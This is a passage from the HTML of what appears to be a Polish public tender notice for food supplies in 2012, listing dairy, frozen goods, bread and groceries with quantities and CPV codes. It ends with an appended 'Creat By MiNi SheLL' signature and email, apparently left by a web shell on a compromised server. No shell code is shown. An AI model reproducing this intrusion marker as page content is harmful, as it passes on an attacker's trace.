12.	Pasztetowa firmowa	Kg	80
13.	Salceson regionalny	Kg	80
14.	Smaczek konserwowy	Kg	80
15.	Szynka kanapkowa	Kg	80
16.	Boczek wędzony	Kg	25
17.	Baleron got. wieprz.	Kg	30
18.	Szynka konserwowa blok	Kg	70
19.	Polędwica wieprzowa mięso	Kg	60
20.	Karkówka wieprzowa bez kości	Kg	120
21.	Kości wieprzowe pokrzepowe	Kg	200
22.	Łopatka wp. b/k mięso	Kg	300
23.	Galareta wieprzowa	              Kg	 60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.13.11.30-5, 15.13.11.35-0, 15.11.11.11-9, 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa nabiału w asortymencie i ilości:1.	Twaróg chudy	Kg	500
2.	Śmietana 18 % (450g)	Szt.	700
3.	Śmietana 18 % (500g)	Szt.	300
4.	Masło z olejem extra (200g)	Kg	120
5.	Ser żółty salami	Kg	120
6.	Ser topiony (100 g)	Szt.	1000
7.	Ser plastry (150 g)	Szt.	500
8.	Mleko pasteryzowane homogenizowane folia       2 %	L	3100
9.	Masło roślinne (500 g)	Kg	450
10.	Jogurt owocowy(125 g)	Szt.	2900
11.	Kefir (200g)	Szt.	1500
12.	Maślanka (1 l )	L	240
13.	Margaryna mleczna (250g)	Kg	120
14.	Jogurt naturalny (400g)	Szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.88.10.00-7, 15.43.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MROŻONKI I KONSERWY RYBNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mrożonek i koserw rybnych a asortymencie i ilości:1.	Śledź w pomidorach      ( 170 g konserwa )	Szt.	300
2.	Śledź w oleju                   ( 170 g konserwa )	Szt.	300
3.	Filety z makreli                ( 170 g konserwa )	Szt.	100
4.	Tuńczyk                          ( 185 g konserwa )	Szt.	200
5.	Fasolka szparagowa      ( 400 g mrożona)	Szt.	180
6.	Kalafior                            ( 400 g mrożony)	Szt.	360
7.	Barszcz ukraiński           ( 450 g mrożony )	Szt.	180
8.	Płaty rybne mrożone filet-panga	Kg	120
9.	Kości kulinarne mrożone	Kg	40
10.	Wątróbka drobiowa mrożona	Kg	70
11.	Noga z kurczaka             ( mrożona, udka )	Kg	250
12.	Kurczak	Kg	350
13.	Śledź w oleju         (2,0 kg       - wiadro )	Kg	50
14.	Filet drobiowy    mrożony	Kg	150
15.	Mieszanka kompotowa (450 g)	Szt.	150
16.	Bukiet jarzyn (450 g)	Szt.	550
17.	Dorsz wędzony	Kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.10.00-3, 15.20.00.00-0, 15.33.10.70-9, 15.11.20.00-6, 15.23.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pieczywa w asortymencie i ilości:1.	Chleb (950g)	Szt.	2800
2.	Chleb razowy mieszany (750 g) 	Szt.	1510
3.	Chleb owsiany  (400g)	Szt.	1130
4.	Strucla (500g)	Szt.	40
5.	Bułka zwykła (100g)	Szt.	7300
6.	Rogal słodki (100g)	Szt.	600
7.	Drożdżówka (90g)	Szt.	800
8.	Kartoflaki  (100g)	Szt.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> POZOSTAŁE RÓŻNE ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa różnych artykułów spożywczych w asortymencie i ilości:1.	Amoniak spożywczy( 25 g )	Szt.	2
2.	Herbata indyjska  (100 g)	Szt.	600
3.	Napój herbaciany  w granul. ( 300 g )	Szt.	48
4.	Sól kuchenna (1 kg)	Kg	140
5.	Soda oczyszczona         ( 30 g )	Szt.	5
6.	Olej uniwersalny (1 l)	Szt.	100
7.	Olej uniwersalny    ( 3 l)	Szt.	10
8.	Smalec kostka    (250 g )	Kg	80
9.	Chrzan tarty            ( 270 g )	Szt.	60
10.	Kukurydza konserwowa            ( 400 g )	Szt.	40
11.	Koncentrat pomidorowy 30 % (200g)	Szt.	250
12.	Pasztet drobiowy           ( 290 g )	Szt.	200
13.	Groszek konserwowy            ( 400 g )	Szt.	70
14.	Papryka konserwowa            ( 0,9 l )	Szt.	80
15.	Ogórki konserwowe       ( 0,9 l )	Szt.	120
16.	Cukier kryształ      (1 kg)	Kg	1000
17.	Cukier puder       (0,5 kg)	Kg	10
18.	Kakao naturalne (200 g)	Szt.	40
19.	Rosół kostka           ( 120 g )	Szt.	60
20.	Żurek śląski            ( 46 g )	Szt.	60
21.	Zupa ogonowa         (57g torebki )	Szt.	150
22.	Sos pieczarkowy      (27 g )	Szt.	50
23.	Musztarda  łagodna ( 470 g )	Szt.	50
24.	Majonez ( 0,9 l )	Szt.	25
25.	Ocet 10 %	L	20
26.	Przyprawa w płynie    0,9 l (do zup)	Szt.	120
27.	Przyprawa warzywna do zup i sosów  w proszku    (  200 g )	Szt.	180
28.	Przyprawa do piernika (25 g )	Szt.	10
29.	Cynamon  (20 g )	Szt.	25
30.	Papryka mielona słodka                     ( 20 g torebki )	Szt.	60
31.	Budyń różne smaki        ( 65 g torebki )	Szt.	500
32.	Ketchup ( 500g )	Szt.	100
33.	Kisiel różne smaki          ( 58 g torebki )	Szt.	100
34.	Kminek                      ( 20 g torebki )	Szt.	50
35.	Kwasek cytrynowy        ( 20 g torebki)	Szt.	120
36.	Pieprz naturalny  mielony                      ( 20 g torebki )	Szt.	200
37.	Proszek do pieczenia                 ( 18 g torebki )	Szt.	50
38.	Cukier waniliowy           ( 16 g torebki )	Szt.	60
39.	Majeranek                       ( 10 g torebki )	Szt.	80
40.	Gałka muszkatołowa         ( 10 g torebki )	Szt.	50
41.	Ziele angielskie              ( 15 g torebki )	Szt.	80
42.	Liść laurowy                   ( 8 g torebki )	Szt.	100
43	Mleko zagęszczone słodzone (530g)	Szt.	72
44.	Wafle tortowe    (200 g )	Szt.	72
45.	Galaretka owocowa    (79 g )	Szt.	400
46.	Rodzynki  (100g )	Szt.	20
47.	Kokos  (100g )	Szt.	10
48.	Drożdże świeże	Kg	1
49.	Sok syrop  ( 0,33 l )	szt.	50
50.	Sok owocowy         ( 0,33 l)	szt.	3000
51.	Sok owocowy b/c                 ( 0,30 l)	szt.	500
52.	Konserwa  tyrolska mięsna  (  300 g )	Szt.	200
53.	Dżem czarna porzeczka              (260 g słoik )	Szt.	50
54.	Marmolada                       ( 0,9 l słoik )	Szt.	10
55.	Mąka pszenna lux                   - poznańska (1 kg )	Kg	350
56.	Mąka ziemniaczana                     ( 0,5 kg )	Kg	10
57.	Kasza manna                      ( 0,5 kg  )	Kg	20
58.	Kasza gryczana                ( 0,5 kg  )	Kg	80
59.	Kasza jęczmienna           ( 0,5 kg  )	Kg	50
60.	Makaron świderki	Kg	50
61.	Makaron lubelski nitka       ( 0,5 kg  )	Kg	50
62.	Bułka tarta                       ( 0,5 kg  )	Kg	15
63.	Groch połówki                ( 0,5 kg  )	Kg	40
64.	Ryż  ( 1 kg  )	Kg	50
65.	Miód pszczeli naturalny                         (400 g słoik )	Szt.	10
66.	Płatki owsiane	Kg	5
67.	Płatki kukurydziane 	Kg	10
68.	Kawa inka (150g)	Szt.	30
69.	Listki waflowe b/c       ( 32 g paczki )	Szt.	1000
70.	Czekolada (100g)	Szt.	200
71.	Czekolada b/c 100g	Szt.	36
72.	Oregano (10 g)	Szt.	50
73.	Bazylia (20 g)	Szt.	50
74.	Oliwa z oliwek      (1 l )	Szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.22.00-6, 15.85.10.00-8, 15.43.00.00-1, 15.84.23.00-5, 15.89.00.00-3, 15.13.10.00-5, 15.80.00.00-6, 15.33.22.90-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com